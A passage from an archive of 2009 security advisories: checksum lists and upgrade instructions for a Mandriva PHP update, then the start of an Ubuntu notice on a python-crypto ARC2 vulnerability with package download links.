eba67947e0ed0eeda43a8872af9b75b3 2008.1/x86_64/php-pdo-5.2.5-14.4mdv2008.1.x86_64.rpm
70e4469edcd51c6bf2628065017ffed7 2008.1/x86_64/php-pdo_dblib-5.2.5-14.4mdv2008.1.x86_64.rpm
1d2da700fe9b49dfc645dc96533de2d3 2008.1/x86_64/php-pdo_mysql-5.2.5-14.4mdv2008.1.x86_64.rpm
2e698a1721ee05ba8018aa394351f622 2008.1/x86_64/php-pdo_odbc-5.2.5-14.4mdv2008.1.x86_64.rpm
4e34a31560a44e21a92075276ae6fb69 2008.1/x86_64/php-pdo_pgsql-5.2.5-14.4mdv2008.1.x86_64.rpm
0785495ba82441704c4c41c1844d6149 2008.1/x86_64/php-pdo_sqlite-5.2.5-14.4mdv2008.1.x86_64.rpm
aa2b9a5d2271fa40bc7074c2ee16b2f9 2008.1/x86_64/php-pgsql-5.2.5-14.4mdv2008.1.x86_64.rpm
56832ddbeb8e20f94fe7332891e203ff 2008.1/x86_64/php-posix-5.2.5-14.4mdv2008.1.x86_64.rpm
15acc7fe100acc365d35d0d5826f883b 2008.1/x86_64/php-pspell-5.2.5-14.4mdv2008.1.x86_64.rpm
f238474dcb6ffcab2f2f3500d39a1c65 2008.1/x86_64/php-readline-5.2.5-14.4mdv2008.1.x86_64.rpm
809d3792ccdab501e0137600b4453314 2008.1/x86_64/php-recode-5.2.5-14.4mdv2008.1.x86_64.rpm
45a0d7ad5e2dbee271c3fe08594f0e51 2008.1/x86_64/php-session-5.2.5-14.4mdv2008.1.x86_64.rpm
a2cdaec928ee3e747009e9a5002e5e23 2008.1/x86_64/php-shmop-5.2.5-14.4mdv2008.1.x86_64.rpm
b93cd9fbd226f65db3b7641258dd1ce2 2008.1/x86_64/php-snmp-5.2.5-14.4mdv2008.1.x86_64.rpm
d9545793c3efdacbc1dfc5bb4890acb3 2008.1/x86_64/php-soap-5.2.5-14.4mdv2008.1.x86_64.rpm
0cbf907e1b6a484e558276d927c87a89 2008.1/x86_64/php-sockets-5.2.5-14.4mdv2008.1.x86_64.rpm
eae5af025e4fd0c5075f1c26c36022cb 2008.1/x86_64/php-sqlite-5.2.5-14.4mdv2008.1.x86_64.rpm
37e4d43c03f74a529aed0baa68835fc6 2008.1/x86_64/php-sysvmsg-5.2.5-14.4mdv2008.1.x86_64.rpm
c78265474f375646e3f749c97359718d 2008.1/x86_64/php-sysvsem-5.2.5-14.4mdv2008.1.x86_64.rpm
8c7de8e3c20e1c97ff3c2e89015d6c25 2008.1/x86_64/php-sysvshm-5.2.5-14.4mdv2008.1.x86_64.rpm
3abe61ac7b93363078ddd705178a13c6 2008.1/x86_64/php-tidy-5.2.5-14.4mdv2008.1.x86_64.rpm
120fd0678453a1ce19499daeecb5c48d 2008.1/x86_64/php-tokenizer-5.2.5-14.4mdv2008.1.x86_64.rpm
3343908cfcb8637f1c51834a9b07c1a3 2008.1/x86_64/php-wddx-5.2.5-14.4mdv2008.1.x86_64.rpm
c8288f3c966582139ad17f7861bbe9ae 2008.1/x86_64/php-xml-5.2.5-14.4mdv2008.1.x86_64.rpm
4469c36e90e4bc1bc33e475db3916b26 2008.1/x86_64/php-xmlreader-5.2.5-14.4mdv2008.1.x86_64.rpm
315a5f4078528a5e941e69b50dfab119 2008.1/x86_64/php-xmlrpc-5.2.5-14.4mdv2008.1.x86_64.rpm
1581ce3d86e8c7c4b0a4fe053fa5943a 2008.1/x86_64/php-xmlwriter-5.2.5-14.4mdv2008.1.x86_64.rpm
6a9b22fdc3704ce032b8ff69a835085d 2008.1/x86_64/php-xsl-5.2.5-14.4mdv2008.1.x86_64.rpm
ae4d0e61d1aba23b9baa304d4a662316 2008.1/x86_64/php-zlib-5.2.5-14.4mdv2008.1.x86_64.rpm
c5bb17d306abc830af1e3289d0feb87e 2008.1/SRPMS/php-5.2.5-14.4mdv2008.1.src.rpm
Mandriva Linux 2009.0:
f72d3b1d596b4f3e6d3e5734017ae1d2 2009.0/i586/libphp5_common5-5.2.6-18.3mdv2009.0.i586.rpm
b70b5a44a084ab088cd7a1e2c96d75be 2009.0/i586/php-bcmath-5.2.6-18.3mdv2009.0.i586.rpm
db8eda5e9355a4abac1c2fa056c8bdaf 2009.0/i586/php-bz2-5.2.6-18.3mdv2009.0.i586.rpm
31291a92a5d92afffa45f80fbd66a193 2009.0/i586/php-calendar-5.2.6-18.3mdv2009.0.i586.rpm
f031463a25e0eafd33ca6f9671986380 2009.0/i586/php-cgi-5.2.6-18.3mdv2009.0.i586.rpm
edb7d50dcb61c5b28714e27e9632fef4 2009.0/i586/php-cli-5.2.6-18.3mdv2009.0.i586.rpm
ce6bd87c1424004bdbf80a59d8edcbdd 2009.0/i586/php-ctype-5.2.6-18.3mdv2009.0.i586.rpm
ed2c69240fb11fa5e24ae283fd3f0576 2009.0/i586/php-curl-5.2.6-18.3mdv2009.0.i586.rpm
e9bbbc7cb51f33526ac9a3c353e1dcef 2009.0/i586/php-dba-5.2.6-18.3mdv2009.0.i586.rpm
07d9fb7ece146328895ae2a7133ec454 2009.0/i586/php-dbase-5.2.6-18.3mdv2009.0.i586.rpm
84fbf3636d32d58d372d80790ace3505 2009.0/i586/php-devel-5.2.6-18.3mdv2009.0.i586.rpm
146ab157a25ada5dc9b3607cf7e458dd 2009.0/i586/php-dom-5.2.6-18.3mdv2009.0.i586.rpm
6ac54813f1322b20ab2fca52af6f9b59 2009.0/i586/php-exif-5.2.6-18.3mdv2009.0.i586.rpm
7436417fa8e2325c8cff794f8696304b 2009.0/i586/php-fcgi-5.2.6-18.3mdv2009.0.i586.rpm
ecbe0d0c774edd2e359528fde4cee6c5 2009.0/i586/php-filter-5.2.6-18.3mdv2009.0.i586.rpm
4de456ace608699dcfc4f28679d3ed7b 2009.0/i586/php-ftp-5.2.6-18.3mdv2009.0.i586.rpm
359220d70d4be36d059b652edf00fff5 2009.0/i586/php-gd-5.2.6-18.3mdv2009.0.i586.rpm
1f0ad71963146c84840780acbcb0ad55 2009.0/i586/php-gettext-5.2.6-18.3mdv2009.0.i586.rpm
4adc622e706cc10deaa885bc14fca519 2009.0/i586/php-gmp-5.2.6-18.3mdv2009.0.i586.rpm
5c75a244754b5c1084ee8e8d4fd4a2da 2009.0/i586/php-hash-5.2.6-18.3mdv2009.0.i586.rpm
36228f1479aa715385f18067ddb382bf 2009.0/i586/php-iconv-5.2.6-18.3mdv2009.0.i586.rpm
b997947d6ab76681ac9dd6b0e69fc06c 2009.0/i586/php-imap-5.2.6-18.3mdv2009.0.i586.rpm
39d4a6fb1920101652d0a9f4f392e4fe 2009.0/i586/php-json-5.2.6-18.3mdv2009.0.i586.rpm
1da4900455c839ab9fb09bb486342b83 2009.0/i586/php-ldap-5.2.6-18.3mdv2009.0.i586.rpm
55deab4b204838cc040c7a7d5c92efc2 2009.0/i586/php-mbstring-5.2.6-18.3mdv2009.0.i586.rpm
0e57d6b6118a25eb157ec58d154fa5b1 2009.0/i586/php-mcrypt-5.2.6-18.3mdv2009.0.i586.rpm
31180aaae42bd0f32201ea28f0f86aad 2009.0/i586/php-mhash-5.2.6-18.3mdv2009.0.i586.rpm
913f7aefe94633147983070e8efd4afa 2009.0/i586/php-mime_magic-5.2.6-18.3mdv2009.0.i586.rpm
0ac4c1576514019f6f9e41cf0347e155 2009.0/i586/php-ming-5.2.6-18.3mdv2009.0.i586.rpm
622f174fac61ac88e14eeaddd0d39dd0 2009.0/i586/php-mssql-5.2.6-18.3mdv2009.0.i586.rpm
397666097b969ab25e006526ced22f04 2009.0/i586/php-mysql-5.2.6-18.3mdv2009.0.i586.rpm
b1e565e8fa3c3eaf29fb1662de8e5307 2009.0/i586/php-mysqli-5.2.6-18.3mdv2009.0.i586.rpm
4d46a7baa48bfcc1fec55dd0548e23ee 2009.0/i586/php-ncurses-5.2.6-18.3mdv2009.0.i586.rpm
9c7706e4433b263cd9e3582e5918893e 2009.0/i586/php-odbc-5.2.6-18.3mdv2009.0.i586.rpm
5bd5bd2e82481713df12f910b356a464 2009.0/i586/php-openssl-5.2.6-18.3mdv2009.0.i586.rpm
06b3d734e8efb7ead5db0d66372a8eba 2009.0/i586/php-pcntl-5.2.6-18.3mdv2009.0.i586.rpm
f685c56f503fa7ee55c072f706c5f12d 2009.0/i586/php-pdo-5.2.6-18.3mdv2009.0.i586.rpm
494913c1dbd24d13a3e53f0f94976e7c 2009.0/i586/php-pdo_dblib-5.2.6-18.3mdv2009.0.i586.rpm
ff86b7a00fbbfa5d1cd8e9e62e00e58c 2009.0/i586/php-pdo_mysql-5.2.6-18.3mdv2009.0.i586.rpm
8152ef86fbefdb271a0a8bed4612dfb8 2009.0/i586/php-pdo_odbc-5.2.6-18.3mdv2009.0.i586.rpm
54836ddbb393bb84f14864e2926e5c56 2009.0/i586/php-pdo_pgsql-5.2.6-18.3mdv2009.0.i586.rpm
323e193a27a4141e3f63357315973110 2009.0/i586/php-pdo_sqlite-5.2.6-18.3mdv2009.0.i586.rpm
8663e75f8ff00082cc88e3470fc3fe14 2009.0/i586/php-pgsql-5.2.6-18.3mdv2009.0.i586.rpm
fccc09bf3215b3bc76647f046743602d 2009.0/i586/php-posix-5.2.6-18.3mdv2009.0.i586.rpm
280b2c80ba27512803aed11fea0751a5 2009.0/i586/php-pspell-5.2.6-18.3mdv2009.0.i586.rpm
af53cd4fac7df275ecbc18f693d309d1 2009.0/i586/php-readline-5.2.6-18.3mdv2009.0.i586.rpm
28e3b4fcac9beed4f2efe590a5d09ef1 2009.0/i586/php-recode-5.2.6-18.3mdv2009.0.i586.rpm
ebb6595e5c1b613373f87056dc82ee4f 2009.0/i586/php-session-5.2.6-18.3mdv2009.0.i586.rpm
ccebafe18a9cd4211ba8fc43c9c8ecf5 2009.0/i586/php-shmop-5.2.6-18.3mdv2009.0.i586.rpm
1ecbe12b56c50787db123b8e73b4ad9f 2009.0/i586/php-snmp-5.2.6-18.3mdv2009.0.i586.rpm
dc0d6dc9c18971e7ae032f5038817d09 2009.0/i586/php-soap-5.2.6-18.3mdv2009.0.i586.rpm
2160d4f86d28c3ac1886a4b6a0b23545 2009.0/i586/php-sockets-5.2.6-18.3mdv2009.0.i586.rpm
f72ee93391f9e3dface795d5dbfeda99 2009.0/i586/php-sqlite-5.2.6-18.3mdv2009.0.i586.rpm
60aeeb93274532fe224c5beb801df15d 2009.0/i586/php-sybase-5.2.6-18.3mdv2009.0.i586.rpm
b3803e6e7914c5912d67bb0e85ae2ead 2009.0/i586/php-sysvmsg-5.2.6-18.3mdv2009.0.i586.rpm
a14394d6fa538fae4d5902560b395a8c 2009.0/i586/php-sysvsem-5.2.6-18.3mdv2009.0.i586.rpm
b7c6414e5144dd7e061068bfd9dd0e54 2009.0/i586/php-sysvshm-5.2.6-18.3mdv2009.0.i586.rpm
95c53411a670dc52ca68099dd2164b50 2009.0/i586/php-tidy-5.2.6-18.3mdv2009.0.i586.rpm
a3c21fd780e82217173668bd2291030d 2009.0/i586/php-tokenizer-5.2.6-18.3mdv2009.0.i586.rpm
9fa159c8fb66c6831471ae4d95118b25 2009.0/i586/php-wddx-5.2.6-18.3mdv2009.0.i586.rpm
57833f2edfb42f0726a52c704c072181 2009.0/i586/php-xml-5.2.6-18.3mdv2009.0.i586.rpm
940fc7e8b5165331ccb5a7568b6889ff 2009.0/i586/php-xmlreader-5.2.6-18.3mdv2009.0.i586.rpm
b59378dc6a60fb4de45ee899b5732f10 2009.0/i586/php-xmlrpc-5.2.6-18.3mdv2009.0.i586.rpm
62b83e8ec57ff04fca9bfba5bc32e85d 2009.0/i586/php-xmlwriter-5.2.6-18.3mdv2009.0.i586.rpm
cad6dfc72ba90c1ae1e161560bdfb09c 2009.0/i586/php-xsl-5.2.6-18.3mdv2009.0.i586.rpm
af0f735b6798d0811010dcb4c2a7f81e 2009.0/i586/php-zlib-5.2.6-18.3mdv2009.0.i586.rpm
b20c32eb23068d90025422202af824e5 2009.0/SRPMS/php-5.2.6-18.3mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
1677f83b6b8861cfe22302cb1575f376 2009.0/x86_64/lib64php5_common5-5.2.6-18.3mdv2009.0.x86_64.rpm
2a9acca7bed660eb110c3b39a8f6f92d 2009.0/x86_64/php-bcmath-5.2.6-18.3mdv2009.0.x86_64.rpm
b724f73dd8313e98c42e9c9dd648627f 2009.0/x86_64/php-bz2-5.2.6-18.3mdv2009.0.x86_64.rpm
e6659ea2a6956e142417839b9559140e 2009.0/x86_64/php-calendar-5.2.6-18.3mdv2009.0.x86_64.rpm
1844e2cf4af9e6d977a5afc205f2917b 2009.0/x86_64/php-cgi-5.2.6-18.3mdv2009.0.x86_64.rpm
515be43d736da244e25adc8a80503bb3 2009.0/x86_64/php-cli-5.2.6-18.3mdv2009.0.x86_64.rpm
77f6e73ba9b06f983c876c7f336a77af 2009.0/x86_64/php-ctype-5.2.6-18.3mdv2009.0.x86_64.rpm
cecdc481b01b009b8e3945c5fe084ca8 2009.0/x86_64/php-curl-5.2.6-18.3mdv2009.0.x86_64.rpm
bd1891c813094860abc8d400d67d8cb0 2009.0/x86_64/php-dba-5.2.6-18.3mdv2009.0.x86_64.rpm
86e7be79c0c028c8099952098ff7471c 2009.0/x86_64/php-dbase-5.2.6-18.3mdv2009.0.x86_64.rpm
9aaeeeaccb645a4808452e5bfa64ec93 2009.0/x86_64/php-devel-5.2.6-18.3mdv2009.0.x86_64.rpm
9bf6f3f9da95b7b4b65d386af9a0cd23 2009.0/x86_64/php-dom-5.2.6-18.3mdv2009.0.x86_64.rpm
c41984bb036e75ed94b1874d9b6ff905 2009.0/x86_64/php-exif-5.2.6-18.3mdv2009.0.x86_64.rpm
ce271b31a4efb0714e32c31c383f0843 2009.0/x86_64/php-fcgi-5.2.6-18.3mdv2009.0.x86_64.rpm
089b190ecd5d8e7a51ef09e3864beee0 2009.0/x86_64/php-filter-5.2.6-18.3mdv2009.0.x86_64.rpm
7dad613fa43a0ef77c81fc5d18e286db 2009.0/x86_64/php-ftp-5.2.6-18.3mdv2009.0.x86_64.rpm
268311d2d48ada48217dd99140f41ee2 2009.0/x86_64/php-gd-5.2.6-18.3mdv2009.0.x86_64.rpm
44cc67db9cd8a7828c28ae25b652df43 2009.0/x86_64/php-gettext-5.2.6-18.3mdv2009.0.x86_64.rpm
d6e5747e71a31bce3e417a19345def04 2009.0/x86_64/php-gmp-5.2.6-18.3mdv2009.0.x86_64.rpm
58042a16dd35d7381426dc3d0c9f0d61 2009.0/x86_64/php-hash-5.2.6-18.3mdv2009.0.x86_64.rpm
dca63f9fca627ed557a1b7d276ccc89f 2009.0/x86_64/php-iconv-5.2.6-18.3mdv2009.0.x86_64.rpm
9da39c2f4505ad84d2addc8aab0be72c 2009.0/x86_64/php-imap-5.2.6-18.3mdv2009.0.x86_64.rpm
0dac93b98b6a8cc22823966d22acae35 2009.0/x86_64/php-json-5.2.6-18.3mdv2009.0.x86_64.rpm
d97297b721af42fcee9079f9da6f00cd 2009.0/x86_64/php-ldap-5.2.6-18.3mdv2009.0.x86_64.rpm
0219f5924cbe290585b2679ce9628965 2009.0/x86_64/php-mbstring-5.2.6-18.3mdv2009.0.x86_64.rpm
8f386693506417ed675afaa93d7a74c0 2009.0/x86_64/php-mcrypt-5.2.6-18.3mdv2009.0.x86_64.rpm
b510504e1fd4395160f511202aa99205 2009.0/x86_64/php-mhash-5.2.6-18.3mdv2009.0.x86_64.rpm
2960e9c3e32b15a0f7e218605e686bcc 2009.0/x86_64/php-mime_magic-5.2.6-18.3mdv2009.0.x86_64.rpm
e4bf93a9d5248d38837ae54dde21a735 2009.0/x86_64/php-ming-5.2.6-18.3mdv2009.0.x86_64.rpm
5a7e875fddbcb69281000b5aed1091e0 2009.0/x86_64/php-mssql-5.2.6-18.3mdv2009.0.x86_64.rpm
0c387ce3b7fde69cf696f0c3adeffacd 2009.0/x86_64/php-mysql-5.2.6-18.3mdv2009.0.x86_64.rpm
013da902befd9a10bc75d31ba33e6ef5 2009.0/x86_64/php-mysqli-5.2.6-18.3mdv2009.0.x86_64.rpm
47f8032d425f6fc6b767d1678058eefe 2009.0/x86_64/php-ncurses-5.2.6-18.3mdv2009.0.x86_64.rpm
c26d02612e36dad905823cee9ce9cb07 2009.0/x86_64/php-odbc-5.2.6-18.3mdv2009.0.x86_64.rpm
4e58eef9892f483a93f3db37d18418d9 2009.0/x86_64/php-openssl-5.2.6-18.3mdv2009.0.x86_64.rpm
42e434e0902918c22b9a3960a4cdd764 2009.0/x86_64/php-pcntl-5.2.6-18.3mdv2009.0.x86_64.rpm
2bdbef90526afc81809431a068098a20 2009.0/x86_64/php-pdo-5.2.6-18.3mdv2009.0.x86_64.rpm
0e4a678e1145a0a5ccefb0db9edcf9eb 2009.0/x86_64/php-pdo_dblib-5.2.6-18.3mdv2009.0.x86_64.rpm
5a7eb81ff57ba8bcdb5fdaca3d3cd9c1 2009.0/x86_64/php-pdo_mysql-5.2.6-18.3mdv2009.0.x86_64.rpm
2807f66c40629a791e10b3de63574814 2009.0/x86_64/php-pdo_odbc-5.2.6-18.3mdv2009.0.x86_64.rpm
99261d1350efacc3d0d3a8c4f570a483 2009.0/x86_64/php-pdo_pgsql-5.2.6-18.3mdv2009.0.x86_64.rpm
4f7c7707b09e5b9d4e25c27466d49f90 2009.0/x86_64/php-pdo_sqlite-5.2.6-18.3mdv2009.0.x86_64.rpm
80c3a1d479bdd704841cc284945d6384 2009.0/x86_64/php-pgsql-5.2.6-18.3mdv2009.0.x86_64.rpm
7672ddc52ae4310c9ca1b56bff611c03 2009.0/x86_64/php-posix-5.2.6-18.3mdv2009.0.x86_64.rpm
ae82652a42301ad71a5d464df80e45d6 2009.0/x86_64/php-pspell-5.2.6-18.3mdv2009.0.x86_64.rpm
b499d861ed3844a0e012f67d44daf2da 2009.0/x86_64/php-readline-5.2.6-18.3mdv2009.0.x86_64.rpm
52dc45f191a6d40c750db1db9192303c 2009.0/x86_64/php-recode-5.2.6-18.3mdv2009.0.x86_64.rpm
2e23b1880a577225e5dcc68ba1487c22 2009.0/x86_64/php-session-5.2.6-18.3mdv2009.0.x86_64.rpm
52e44e76fd66aaaeab22fe50f246a199 2009.0/x86_64/php-shmop-5.2.6-18.3mdv2009.0.x86_64.rpm
fd4b242725e03dd3ed4820455c344518 2009.0/x86_64/php-snmp-5.2.6-18.3mdv2009.0.x86_64.rpm
c500a028138b535784500a43c1d6f384 2009.0/x86_64/php-soap-5.2.6-18.3mdv2009.0.x86_64.rpm
a9a46258d2c05951e0293d7f73e3af92 2009.0/x86_64/php-sockets-5.2.6-18.3mdv2009.0.x86_64.rpm
b57fc84ff9809cc4c6285712ecc9771c 2009.0/x86_64/php-sqlite-5.2.6-18.3mdv2009.0.x86_64.rpm
167b240500b2c53b87d577db2c0702f8 2009.0/x86_64/php-sybase-5.2.6-18.3mdv2009.0.x86_64.rpm
49f0debaea7baf9882233854f86b18c9 2009.0/x86_64/php-sysvmsg-5.2.6-18.3mdv2009.0.x86_64.rpm
aae13312a26200026de7d750f5428d95 2009.0/x86_64/php-sysvsem-5.2.6-18.3mdv2009.0.x86_64.rpm
4b8507a1575955b9091aae3499b6d5d7 2009.0/x86_64/php-sysvshm-5.2.6-18.3mdv2009.0.x86_64.rpm
effb73b94df0ce5e1f029b38d84b2cd0 2009.0/x86_64/php-tidy-5.2.6-18.3mdv2009.0.x86_64.rpm
ef2897836ef8be930dd2dab6b33b251a 2009.0/x86_64/php-tokenizer-5.2.6-18.3mdv2009.0.x86_64.rpm
3edb14da528869d1d9365aa8bfdaac72 2009.0/x86_64/php-wddx-5.2.6-18.3mdv2009.0.x86_64.rpm
34c634415faf8d831b8e75f32ad41538 2009.0/x86_64/php-xml-5.2.6-18.3mdv2009.0.x86_64.rpm
8488eef085ba118e31879e32c39772be 2009.0/x86_64/php-xmlreader-5.2.6-18.3mdv2009.0.x86_64.rpm
74756c45ae06718f6232714b9bab055e 2009.0/x86_64/php-xmlrpc-5.2.6-18.3mdv2009.0.x86_64.rpm
8ac25444070c67fb858ab009d916e9ab 2009.0/x86_64/php-xmlwriter-5.2.6-18.3mdv2009.0.x86_64.rpm
3551f65ddd2c4937a5ec75528f3c1371 2009.0/x86_64/php-xsl-5.2.6-18.3mdv2009.0.x86_64.rpm
2363f602ac7384bc114e3f222fd4eb95 2009.0/x86_64/php-zlib-5.2.6-18.3mdv2009.0.x86_64.rpm
b20c32eb23068d90025422202af824e5 2009.0/SRPMS/php-5.2.6-18.3mdv2009.0.src.rpm
Corporate 4.0:
d406669c2d2f94a8402343fd6bf0df25 corporate/4.0/i586/libphp5_common5-5.1.6-1.12.20060mlcs4.i586.rpm
6e585f72c7492e2559d184cdfa55beae corporate/4.0/i586/php-cgi-5.1.6-1.12.20060mlcs4.i586.rpm
d67996d52c00a5b3f4f00d35bdc90188 corporate/4.0/i586/php-cli-5.1.6-1.12.20060mlcs4.i586.rpm
932c83cf0648bdd9b6f209097550c3c7 corporate/4.0/i586/php-devel-5.1.6-1.12.20060mlcs4.i586.rpm
92c539bebbb5c3817b7fd78f7517959d corporate/4.0/i586/php-fcgi-5.1.6-1.12.20060mlcs4.i586.rpm
29216a235396d18c175a3dc022285c37 corporate/4.0/i586/php-mbstring-5.1.6-1.3.20060mlcs4.i586.rpm
6a538adffaaca7cfa9b4000ead754808 corporate/4.0/SRPMS/php-5.1.6-1.12.20060mlcs4.src.rpm
1768f58b0dc0aa15a5f4349455cdafc4 corporate/4.0/SRPMS/php-mbstring-5.1.6-1.3.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
e44d2798fe9e1e8f2d3c749c1c5040b6 corporate/4.0/x86_64/lib64php5_common5-5.1.6-1.12.20060mlcs4.x86_64.rpm
2f5b3ec25a830c7941090b9add54589d corporate/4.0/x86_64/php-cgi-5.1.6-1.12.20060mlcs4.x86_64.rpm
7b76a96665a14726ef57ea937438dd06 corporate/4.0/x86_64/php-cli-5.1.6-1.12.20060mlcs4.x86_64.rpm
288cb0f92fa4ca27fe1c2c758895e2fd corporate/4.0/x86_64/php-devel-5.1.6-1.12.20060mlcs4.x86_64.rpm
fd9be7647a87623c051fe257b3b7c784 corporate/4.0/x86_64/php-fcgi-5.1.6-1.12.20060mlcs4.x86_64.rpm
db1f62123547503bf8a4b6252ef495c3 corporate/4.0/x86_64/php-mbstring-5.1.6-1.3.20060mlcs4.x86_64.rpm
6a538adffaaca7cfa9b4000ead754808 corporate/4.0/SRPMS/php-5.1.6-1.12.20060mlcs4.src.rpm
1768f58b0dc0aa15a5f4349455cdafc4 corporate/4.0/SRPMS/php-mbstring-5.1.6-1.3.20060mlcs4.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJsBQ3mqjQ0CJFipgRAh0lAKDQBkTRQ5uoRcqLtSQ0PmRJi4zAPgCg8ndA
/JhqK6p7yB2SxgBbpXjlQMI=TtCV
-----END PGP SIGNATURE-----
From - Fri Mar 6 10:51:11 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000672e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39643-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 86191ECDB0
for <lists@securityspace.com>; Fri, 6 Mar 2009 10:42:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3511A143865; Fri, 6 Mar 2009 08:38:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22990 invoked from network); 5 Mar 2009 23:05:55 -0000
Date: Thu, 5 Mar 2009 15:38:36 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-729-1] Python Crypto vulnerability
Message-ID: <20090305233836.GQ10132@outflux.net>
Reply-To: Ubuntu Security <security@ubuntu.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="oTHb8nViIGeoXxdp"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.64 on 10.2.0.1
Status:
--oTHb8nViIGeoXxdp
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================Ubuntu Security Notice USN-729-1 March 05, 2009
python-crypto vulnerability
CVE-2009-0544
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
python2.4-crypto 2.0.1+dfsg1-1ubuntu1.1
Ubuntu 7.10:
python-crypto 2.0.1+dfsg1-2ubuntu1.1
Ubuntu 8.04 LTS:
python-crypto 2.0.1+dfsg1-2.1ubuntu1.1
Ubuntu 8.10:
python-crypto 2.0.1+dfsg1-2.3ubuntu0.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Mike Wiacek discovered that the ARC2 implementation in Python Crypto
did not correctly check the key length. If a user or automated system
were tricked into processing a malicious ARC2 stream, a remote attacker
could execute arbitrary code or crash the application using Python Crypto,
leading to a denial of service.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-1ubuntu1.1.diff.gz
Size/MD5: 10150 d118d7b4c9cbb3aba916f869d8e5f1b3
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-1ubuntu1.1.dsc
Size/MD5: 770 29a123e73e9324901e415e4d2be2f323
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1.orig.tar.gz
Size/MD5: 158593 f81d94a506981c67188f08057d797420
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-1ubuntu1.1_amd64.deb
Size/MD5: 11154 e2465021dedb713c54f7d3e814167cf2
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python2.4-crypto_2.0.1+dfsg1-1ubuntu1.1_amd64.deb
Size/MD5: 171042 61b21abd565ef958e32a4297066ce701
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-1ubuntu1.1_i386.deb
Size/MD5: 11156 3f9ccecc35ad1d27b2818da0d1285b0c
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python2.4-crypto_2.0.1+dfsg1-1ubuntu1.1_i386.deb
Size/MD5: 164156 f09da47006c94472c6c5ae5a77abdcc5
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-1ubuntu1.1_powerpc.deb
Size/MD5: 11158 4f9a9214e15aa7d809a7871ec4e5cefe
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python2.4-crypto_2.0.1+dfsg1-1ubuntu1.1_powerpc.deb
Size/MD5: 182392 9eae34b2b8ace41afb35fabf3199bdd8
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-1ubuntu1.1_sparc.deb
Size/MD5: 11158 a6f18647cd0130a1e64f89c5042f5277
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python2.4-crypto_2.0.1+dfsg1-1ubuntu1.1_sparc.deb
Size/MD5: 163300 e115a1d73e987e02803e3c10d1f33c55
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1.diff.gz
Size/MD5: 10952 4005a6b69726a90b63e96595f8d446ec
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1.dsc
Size/MD5: 960 6e166f36bff95826ad5739087a9dd9cd
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1.orig.tar.gz
Size/MD5: 158593 f81d94a506981c67188f08057d797420
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
